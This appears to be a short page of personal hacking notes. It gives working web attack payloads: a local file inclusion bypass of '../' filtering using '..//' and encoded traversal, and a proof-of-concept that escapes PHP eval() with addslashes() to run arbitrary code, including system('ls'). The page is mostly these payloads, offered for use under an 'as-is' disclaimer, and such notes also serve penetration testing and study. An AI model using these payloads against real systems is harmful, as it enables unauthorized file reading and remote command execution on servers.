Skip to main content
  1. Hacking/


Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Local file inclusion #

  • ../ specific find/replace can be bypassed with ..//
  • e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address/uploads/..//sys/class/net/eth0/address
  • Resolve a network path = http://host.tld/?page=//

PHP - Bypass eval() with addslashes() #

Where a value from a URL is passed through eval() with addslashes()

POC: ?str=${eval($_GET[1])}&1=phpinfo();

For example: GET /?format=${eval($_GET[1])}&1=system('ls');